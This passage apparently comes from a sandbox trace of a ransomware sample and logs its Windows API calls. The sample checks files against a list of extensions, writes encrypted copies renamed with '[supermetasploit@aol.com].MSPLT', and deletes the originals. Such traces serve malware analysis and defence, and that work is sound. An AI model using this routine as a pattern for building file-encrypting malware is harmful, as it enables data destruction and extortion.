Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.545] lstrlenW (lpString=".doc") returned 4 [0186.545] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.545] lstrlenW (lpString=".docx") returned 5 [0186.545] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.545] lstrlenW (lpString=".pdf") returned 4 [0186.545] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.545] lstrlenW (lpString=".xls") returned 4 [0186.545] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.545] lstrlenW (lpString=".xlsx") returned 5 [0186.546] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.546] lstrlenW (lpString=".ppt") returned 4 [0186.546] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.546] lstrlenW (lpString=".zip") returned 4 [0186.546] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.546] lstrlenW (lpString=".rar") returned 4 [0186.546] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.546] lstrlenW (lpString=".bz2") returned 4 [0186.546] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.546] lstrlenW (lpString=".7z") returned 3 [0186.546] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.546] lstrlenW (lpString=".dbf") returned 4 [0186.546] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.546] lstrlenW (lpString=".1cd") returned 4 [0186.546] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.546] lstrlenW (lpString=".jpg") returned 4 [0186.546] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.546] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.546] lstrlenW (lpString="AG00167_.GIF") returned 12 [0186.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.547] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=4894) returned 1 [0186.547] CloseHandle (hObject=0x38c) returned 1 [0186.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif")) returned 0x220 [0186.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.547] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.547] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0186.548] GetLastError () returned 0x0 [0186.548] ReadFile (hFile=0x38c, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0) Thread: id = 9 os_tid = 0x12a4 [0164.808] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x79dba0 [0164.809] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x7adba8 [0164.809] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad68 [0164.809] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d060 [0164.809] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ae58 [0164.809] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x2eb8020 [0164.812] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad50 [0164.812] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ad50, Size=0x20) returned 0x74e8e0 [0164.812] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af30 [0164.812] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af30, Size=0x20) returned 0x74e9a8 [0164.812] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0164.813] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0164.813] Wow64DisableWow64FsRedirection (in: OldValue=0x29aff50 | out: OldValue=0x29aff50*=0x0) returned 1 [0164.813] lstrlenW (lpString="kernel32.dll") returned 12 [0164.813] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e8e0 | out: hHeap=0x710000) returned 1 [0164.813] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0164.813] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e9a8 | out: hHeap=0x710000) returned 1 [0164.813] Sleep (dwMilliseconds=0x64) [0166.917] Sleep (dwMilliseconds=0x64) [0167.327] Sleep (dwMilliseconds=0x64) [0167.652] lstrcmpiW (lpString1=".ini", lpString2=".MSPLT") returned -1 [0167.652] lstrlenW (lpString="desktop.ini") returned 11 [0167.652] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0167.777] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=129) returned 1 [0167.777] CloseHandle (hObject=0x2ec) returned 1 [0167.777] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 [0167.777] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0167.777] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0167.778] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0167.778] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0167.778] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0167.778] GetLastError () returned 0x0 [0167.778] ReadFile (in: hFile=0x2ec, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x81, lpOverlapped=0x0) returned 1 [0167.791] WriteFile (in: hFile=0x2cc, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x90, lpOverlapped=0x0) returned 1 [0167.792] ReadFile (in: hFile=0x2ec, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0167.792] WriteFile (in: hFile=0x2cc, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xea, lpOverlapped=0x0) returned 1 [0167.792] SetEndOfFile (hFile=0x2cc) returned 1 [0167.792] CloseHandle (hObject=0x2cc) returned 1 [0167.793] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0167.793] SetEndOfFile (hFile=0x2ec) returned 1 [0167.794] CloseHandle (hObject=0x2ec) returned 1 [0167.794] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x26) returned 1 [0167.795] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 1 [0167.795] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.795] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.795] lstrlenW (lpString=".doc") returned 4 [0167.795] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.795] lstrlenW (lpString=".docx") returned 5 [0167.795] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0167.795] lstrlenW (lpString=".pdf") returned 4 [0167.795] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0167.795] lstrlenW (lpString=".xls") returned 4 [0167.795] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0167.795] lstrlenW (lpString=".xlsx") returned 5 [0167.795] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0167.795] lstrlenW (lpString=".ppt") returned 4 [0167.795] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0167.795] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.795] lstrlenW (lpString=".zip") returned 4 [0167.795] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0167.795] lstrlenW (lpString=".rar") returned 4 [0167.795] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0167.795] lstrlenW (lpString=".bz2") returned 4 [0167.795] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.795] lstrlenW (lpString=".7z") returned 3 [0167.795] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.795] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.795] lstrlenW (lpString=".dbf") returned 4 [0167.796] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.796] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.796] lstrlenW (lpString=".1cd") returned 4 [0167.796] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.796] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.796] lstrlenW (lpString=".jpg") returned 4 [0167.796] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0167.796] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.796] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.796] lstrlenW (lpString=".doc") returned 4 [0167.796] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.796] lstrlenW (lpString=".docx") returned 5 [0167.796] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0167.796] lstrlenW (lpString=".pdf") returned 4 [0167.796] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0167.796] lstrlenW (lpString=".xls") returned 4 [0167.796] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0167.796] lstrlenW (lpString=".xlsx") returned 5 [0167.796] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0167.796] lstrlenW (lpString=".ppt") returned 4 [0167.796] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0167.796] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.796] lstrlenW (lpString=".zip") returned 4 [0167.796] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0167.796] lstrlenW (lpString=".rar") returned 4 [0167.796] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0167.796] lstrlenW (lpString=".bz2") returned 4 [0167.796] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.796] lstrlenW (lpString=".7z") returned 3 [0167.796] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.796] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.796] lstrlenW (lpString=".dbf") returned 4 [0167.796] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.796] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.796] lstrlenW (lpString=".1cd") returned 4 [0167.796] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.797] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0167.797] lstrlenW (lpString=".jpg") returned 4 [0167.797] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0167.797] Sleep (dwMilliseconds=0x64) [0168.917] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0168.917] lstrlenW (lpString="LocalizedData.xml") returned 17 [0168.917] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0168.917] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=82346) returned 1 [0168.917] CloseHandle (hObject=0x308) returned 1 [0168.917] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 0x80 [0168.917] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.917] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0168.918] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0168.918] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0168.918] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0168.920] GetLastError () returned 0x0 [0168.920] ReadFile (in: hFile=0x308, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x141aa, lpOverlapped=0x0) returned 1 [0168.924] WriteFile (in: hFile=0x310, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x141b0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x141b0, lpOverlapped=0x0) returned 1 [0168.926] ReadFile (in: hFile=0x308, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0168.926] WriteFile (in: hFile=0x310, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xf6, lpOverlapped=0x0) returned 1 [0168.926] SetEndOfFile (hFile=0x310) returned 1 [0168.926] CloseHandle (hObject=0x310) returned 1 [0168.931] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0168.931] SetEndOfFile (hFile=0x308) returned 1 [0168.932] CloseHandle (hObject=0x308) returned 1 [0168.933] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0168.933] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 1 [0168.934] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.934] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.934] lstrlenW (lpString=".doc") returned 4 [0168.934] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.934] lstrlenW (lpString=".docx") returned 5 [0168.934] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.934] lstrlenW (lpString=".pdf") returned 4 [0168.934] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.934] lstrlenW (lpString=".xls") returned 4 [0168.934] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.934] lstrlenW (lpString=".xlsx") returned 5 [0168.934] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.934] lstrlenW (lpString=".ppt") returned 4 [0168.934] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.934] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.934] lstrlenW (lpString=".zip") returned 4 [0168.934] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.934] lstrlenW (lpString=".rar") returned 4 [0168.934] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.934] lstrlenW (lpString=".bz2") returned 4 [0168.934] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.934] lstrlenW (lpString=".7z") returned 3 [0168.934] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.935] lstrlenW (lpString=".dbf") returned 4 [0168.935] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.935] lstrlenW (lpString=".1cd") returned 4 [0168.935] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.935] lstrlenW (lpString=".jpg") returned 4 [0168.935] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.935] lstrlenW (lpString=".doc") returned 4 [0168.935] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.935] lstrlenW (lpString=".docx") returned 5 [0168.935] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.935] lstrlenW (lpString=".pdf") returned 4 [0168.935] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.935] lstrlenW (lpString=".xls") returned 4 [0168.935] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.935] lstrlenW (lpString=".xlsx") returned 5 [0168.936] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.936] lstrlenW (lpString=".ppt") returned 4 [0168.936] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.936] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.936] lstrlenW (lpString=".zip") returned 4 [0168.936] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.936] lstrlenW (lpString=".rar") returned 4 [0168.936] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.936] lstrlenW (lpString=".bz2") returned 4 [0168.936] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.936] lstrlenW (lpString=".7z") returned 3 [0168.936] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.936] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.936] lstrlenW (lpString=".dbf") returned 4 [0168.936] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.936] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.936] lstrlenW (lpString=".1cd") returned 4 [0168.936] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.936] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0168.936] lstrlenW (lpString=".jpg") returned 4 [0168.936] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.937] Sleep (dwMilliseconds=0x64) [0169.203] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0169.203] lstrlenW (lpString="eula.rtf") returned 8 [0169.203] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.204] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=8876) returned 1 [0169.205] CloseHandle (hObject=0x2f8) returned 1 [0169.205] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 0x80 [0169.205] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.205] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.205] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.205] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.205] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.745] GetLastError () returned 0x0 [0169.745] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x22ac, lpOverlapped=0x0) returned 1 [0169.748] WriteFile (in: hFile=0x300, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x22b0, lpOverlapped=0x0) returned 1 [0169.750] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0169.750] WriteFile (in: hFile=0x300, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0169.750] SetEndOfFile (hFile=0x300) returned 1 [0169.750] CloseHandle (hObject=0x300) returned 1 [0169.752] SetFilePointerEx (in: hFile=0x2f8, 